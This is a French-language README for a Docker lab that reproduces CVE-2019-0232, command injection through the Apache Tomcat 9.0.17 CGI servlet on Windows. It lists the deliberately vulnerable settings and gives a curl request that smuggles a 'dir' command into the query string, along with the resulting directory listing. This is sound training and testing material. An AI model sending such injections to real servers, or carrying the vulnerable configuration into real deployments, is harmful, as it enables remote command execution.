
Ce dépôt fournit un environnement de laboratoire basé sur Docker pour reproduire la vulnérabilité CVE-2019-0232 dans Apache Tomcat 9.0.17 sur Windows.
CVE-2019-0232 est une vulnérabilité d'exécution de code à distance dans le servlet CGI Apache Tomcat lorsqu'il s'exécute sur Windows. Le problème provient d'une gestion incorrecte des arguments de la ligne de commande lorsque le paramètre enableCmdLineArguments est défini sur true. Un attaquant peut transmettre des arguments arbitraires au script CGI via la chaîne de requête, entraînant l'exécution de commandes système.
enableCmdLineArguments=true dans la configuration du servlet CGItomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
├── apache-tomcat-9.0.17-windows-x64.zip
└── apache-tomcat-9.0.17
├── conf
│ └── context.xml ← (privileged="true")
└── webapps
└── ROOT
└── WEB-INF
├── web.xml ← (CGI configuration)
└── cgi-bin
└── test.bat ← (.bat script)
privileged="true" pour permettre à l'application web d'utiliser le servlet CGI.enableCmdLineArguments=true et le mappe sur /cgi-bin/*.docker-compose build --no-cache
docker-compose up -d
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"
Welcome to CGI Test Page
Volume in drive C has no label.
Volume Serial Number is 3E70-7C38
Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin
07/12/2026 11:45 AM <DIR> .
07/12/2026 11:45 AM <DIR> ..
07/12/2026 12:25 PM 78 test.bat
1 File(s) 78 bytes
2 Dir(s) 136,027,971,584 bytes free